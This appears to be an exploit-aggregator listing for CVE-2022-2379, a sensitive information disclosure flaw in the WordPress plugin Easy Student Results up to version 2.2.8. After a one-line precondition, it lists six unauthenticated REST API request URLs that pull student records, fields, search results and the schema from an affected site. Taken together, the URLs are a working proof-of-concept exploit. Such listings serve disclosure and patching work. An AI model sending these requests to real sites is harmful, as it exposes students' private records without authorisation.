Exploit for Easy Student Results <= 2.2.8 - Sensitive Information Disclosure via REST API CVE-2022-2379

Name: Exploit for Easy Student Results <= 2.2.8 - Sensitive Information Disclosure via REST API CVE-2022-2379
Rating: 5 (88 reviews)

2022-07-19 | CVSS 1.7

## https://sploitus.com/exploit?id=WPEX-ID:0773BA24-212E-41D5-9AE0-1416EA2C9DB6
When the "Enable API for Mobile Apps" settings (/wp-admin/admin.php?page=rps_result_settings) is enabled

https://example.com/wp-json/rps_result/v1/route/show_result?exam_record_id=2&student_id=32
https://example.com/wp-json/rps_result/v1/route/student_fields
https://example.com/wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1&semester_id=1
https://example.com/wp-json/rps_result/v1/route/result_fields
https://example.com/wp-json/rps_result/v1/route/list_results?exam_id=1&department_id=1&batch_id=1
https://example.com/wp-json/rps_result/v1/route/schema